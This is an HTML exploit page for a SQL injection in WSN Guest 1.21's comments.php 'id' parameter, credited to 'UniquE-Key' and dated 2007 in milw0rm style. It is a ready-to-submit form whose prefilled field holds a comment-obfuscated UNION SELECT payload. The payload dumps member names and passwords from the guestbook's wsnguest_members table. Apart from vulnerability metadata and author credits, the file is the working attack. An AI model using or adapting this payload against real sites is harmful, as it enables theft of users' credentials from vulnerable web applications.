76 lines
No EOL
1.7 KiB
HTML
76 lines
No EOL
1.7 KiB
HTML
<!--
|
|
|
|
WSN Guest 1.21 Version Comments.PHP "ID" SQL Injection Exploit
|
|
|
|
Type :
|
|
|
|
SQL Injection
|
|
|
|
Release Date :
|
|
|
|
{2007-03-14}
|
|
|
|
Product / Vendor :
|
|
|
|
WSN Guestbook
|
|
|
|
http://scripts.webmastersite.net/wsnguest/
|
|
|
|
Bug :
|
|
|
|
http://localhost/script/comments.php?id=-SQL Inj.-
|
|
|
|
SQL Injection Exploit :
|
|
|
|
-->
|
|
|
|
<title>WSN Guest 1.21 Version Comments.PHP "ID" SQL Injection Exploit</title>
|
|
<body bgcolor="#000000">
|
|
<form name="entryform" method="get" action="http://localhost/script/comments.php">
|
|
<table width="500" border="0" align="center">
|
|
<font face="Verdana" size="2" color="#FF0000"><b>WSN Guest 1.21 Version Comments.PHP "ID" SQL Injection Exploit</b></font>
|
|
<br>
|
|
<tr>
|
|
<td align="right"><font face="Arial" size="1" color="#00FF00">SQL Injection Code</td>
|
|
<td> </td>
|
|
<td><input name="id" type="text" value="-1/**/UNION/**/SELECT/**/name,password,null,null,null,null,null,null,null,null,null/**/FROM/**/wsnguest_members/*" class="inputbox" style="color: #000000" style="width:300px; "></td>
|
|
</tr>
|
|
<tr>
|
|
<td align="right"><font face="Arial" size="1" color="#00FF00">Search Board</td>
|
|
<td> </td>
|
|
<td>
|
|
<select name="">
|
|
<option>(ALL)</option>
|
|
</select>
|
|
<input type="submit" value="Apply">
|
|
</td>
|
|
</tr>
|
|
</table>
|
|
</form>
|
|
<center><font face="Verdana" size="2" color="#FF0000"><b>UniquE-Key{UniquE-Cracker}</b></font>
|
|
<br>
|
|
<font face="Verdana" size="2" color="#FF0000"><b>UniquE@UniquE-Key.ORG</b></font>
|
|
<br>
|
|
<font face="Verdana" size="2" color="#FF0000"><b>http://UniquE-Key.ORG</b></font></center>
|
|
|
|
<!--
|
|
|
|
Tested :
|
|
|
|
WSN Guest 1.21
|
|
|
|
Vulnerable :
|
|
|
|
WSN Guest 1.21
|
|
|
|
WSN Guest 1.02
|
|
|
|
Author :
|
|
|
|
UniquE-Key{UniquE-Cracker}
|
|
UniquE(at)UniquE-Key.Org
|
|
http://www.UniquE-Key.Org
|
|
|
|
-->
|
|
|
|
# milw0rm.com [2007-03-14] |